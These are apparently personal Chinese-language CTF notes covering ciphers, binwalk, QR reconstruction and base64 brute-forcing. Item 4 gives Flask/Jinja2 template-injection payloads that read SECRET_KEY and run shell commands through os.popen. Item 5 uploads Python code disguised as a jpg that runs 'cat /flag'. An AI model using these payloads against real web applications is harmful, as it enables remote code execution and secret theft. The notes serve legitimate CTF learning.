1、栅栏密码：CTF在线工具-在线栅栏密码加密|在线栅栏密码解密|栅栏密码算法|Railfence Cipher

有点像代换密码。

2、在线识图工具，可以识别图片地点

3、binwalk工具，可以使用。。进行解压隐藏的jpg文件，属性的设备信息竟然是16进制码hex

binwalk -e 文件名

4、flask模版注入flag={{config.SECRET_KEY}}

flag={{config.__class__.__init__.__globals__['os'].popen('ls ../').read()}}类似命令执行，通过目录进行寻找app/flag

5、文件上传，直接上传有python代码的jpg文件，F12源代码提示中有flag

import os

os.system('cat /flag')

6、编译二维码（参考：BugKu：0和1的故事(writeup)_哇哈爱吃糖的博客-CSDN博客_bugku0和1）

from PIL import Image

with open("1和0的故事.txt", "r") as f:
    data = [list(i.strip()) for i in f.readlines()]

# 7*7的定位标志
flag = [
    [1, 1, 1, 1, 1, 1, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 1, 1, 1, 0, 1],
    [1, 0, 0, 0, 0, 0, 1],
    [1, 1, 1, 1, 1, 1, 1]
]

img = Image.new("1", (25, 25))
for i in range(len(data)):
    for j in range(len(data[1])):
        # 左上角定位标志
        if i < 7 and j < 7:
            img.putpixel((i, j), flag[i][j] ^ 1)
        # 左下角定位标志
        elif i > 17 and j < 7:
            img.putpixel((i, j), flag[i-18][j] ^ 1)
        # 右上角定位标志
        elif i < 7 and j > 17:
            img.putpixel((i, j), flag[i][j-18] ^ 1)
        else:
            img.putpixel((i, j), int(data[i][j]) ^ 1)

img.resize((500, 500)).show()

7、抄错的字符

以下是我写的小程序，通过运行程序可以进行base64解码并得到相应的字符，进行拼接。把字符串分成4个一组进行的解码，用分割线隔开。

import math,base64


corpt="QWIHBLGZZXJSXZNVBZW"
#base64分割成4个一组
#两个数据遍历函数
def twoTo(list1,list2):
    result=[]
        
    for i in list1:
        for j in list2:

                       
            result.append(str(i)+str(j))
           

    return result

#获取数组长度
length=math.ceil(len(corpt)/4)
lcorpt=[]
#分割字符串
for i in range(length):
    lcorpt.append(corpt[i*4:i*4+4])

#补充数据=
if len(lcorpt[-1])==1:
    lcorpt[-1]=lcorpt[-1]+"="*3
elif len(lcorpt[-1])==2:
    lcorpt[-1]=lcorpt[-1]+"="*2
elif len(lcorpt[-1])==3:
    lcorpt[-1]=lcorpt[-1]+"="*1
else:
    print("prefect")

lalp={"A":["A","a"],"B":["B","b"],"C":["C","c"],"D":["D","d"],"E":["E","e"],
      "F":["F","f"],"G":["G","g",9],"H":["H","h"],"I":["I","i",1],"J":["J","j"],
      "K":["K","k"],"L":["L","l"],"M":["M","m"],"N":["N","n"],"O":["O","o",0],
      "P":["P","p"],"Q":["Q","q",9],"R":["R","r"],"S":["S","s",5],"T":["T","t"],
      "U":["U","u"],"V":["V","v"],"W":["W","w"],"X":["X","x"],"Y":["Y","y"],"Z":["Z","z",2],"=":"="}


list1=[]
#循环四字数组
for i in lcorpt:
    #循环数组字符串
    print("====================")
    fistli=twoTo(lalp[i[0]],lalp[i[1]])
    secondli=twoTo(lalp[i[2]],lalp[i[3]])
    
        #循环前后两组进行配对
    for k in fistli:
        for m in secondli:
            try:
                flag=base64.urlsafe_b64decode(k+m).decode("utf-8")
                print(flag)
            except Exception as e:
                
                print("")